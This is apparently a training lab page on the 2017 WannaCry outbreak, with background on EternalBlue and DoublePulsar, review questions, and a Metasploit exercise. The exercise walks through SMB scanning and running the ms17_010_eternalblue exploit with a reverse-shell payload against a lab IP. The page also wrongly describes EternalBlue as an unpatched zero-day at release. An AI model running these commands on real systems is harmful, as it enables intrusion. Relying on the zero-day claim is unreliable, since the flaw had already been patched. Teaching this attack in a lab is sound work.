WannaCry Ransomware

Overview

In May of 2017, the ransomware worm known as WannaCry infected numerous organizations, causing significant damage. Over 200,000 systems were infected across 150 countries, with damages in the hundreds of millions of dollars. Prominent victims of WannaCry included Boeing, Honda, the NHS of England and Scotland, and the University of Montreal. The ransomware demanded a $300 Bitcoin payment in exchange for the decryption of the victim's files, with the amount increasing over time if left unpaid. On the same day of WannaCry's release, a hardcoded kill switch was discovered and promptly registered by a security researcher. While this did not help systems already infected, it effectively halted further spread of WannaCry within a matter of hours.

Vulnerability Details

WannaCry used the previously undisclosed EternalBlue vulnerability (CVE-2017-0144), which takes advantage of SMBv1 mishandling specially crafted packets, allowing for remote code execution. A backdoor implant tool known as DoublePulsar is also used. The tool is able to run in system memory, allowing it to stealthily install malware on the host. Both EternalBlue and DoublePulsar were believed to be originally developed by the NSA, and later stolen by the hacking group known as The Shadow Brokers, meaning they were not publicly known. Such vulnerabilities are called “Zero Days”, referring to the amount of days the vulnerability's existence has been known. Since previously unknown, security professionals have to begin developing patches the same day of release.

Lab Terminal

In this terminal activity, students will simulate how attackers exploited a critical SMB vulnerability to spread ransomware, mirroring the events of the 2017 WannaCry outbreak. The exercise demonstrates how the EternalBlue exploit leveraged the MS17-010 flaw to gain remote access to vulnerable Windows systems and deploy malicious payloads. Using Nmap and Metasploit, students will identify open SMB ports, verify the vulnerability, and execute the exploit in a controlled environment to observe how quickly a worm can propagate once access is achieved. This activity helps students understand how unpatched systems and network exposure can lead to devastating ransomware infections and emphasizes the importance of timely updates, segmented networks, and proactive vulnerability management in preventing large-scale outbreaks like WannaCry.

Instructions:

  • Use the help command to see all available commands.
  • The vulnerable machine's IP is 192.168.1.103.
  • Begin with nmap -p 139,445 192.168.1.0/24 to scan for open SMB ports.
  • Launch Metasploit with msfconsole, then use use auxiliary/scanner/smb/smb_ms17_010.
  • Set the target with set RHOST 192.168.1.103 and exploit with run.
  • Further exploit with use exploit/windows/smb/ms17_010_eternalblue, set payload with set payload generic/shell_reverse_tcp, and execute with exploit.

Resources

Learn more about the commands being utilized:

Review Questions

What was the primary method used by WannaCry to encrypt victims' data?
What type of software was WannaCry?
What was the role of DoublePulsar in the WannaCry attack?
How was WannaCry's spread significantly reduced?
What could have prevented the WannaCry infection?
What is the hidden flag after exploiting the vulnerable machine?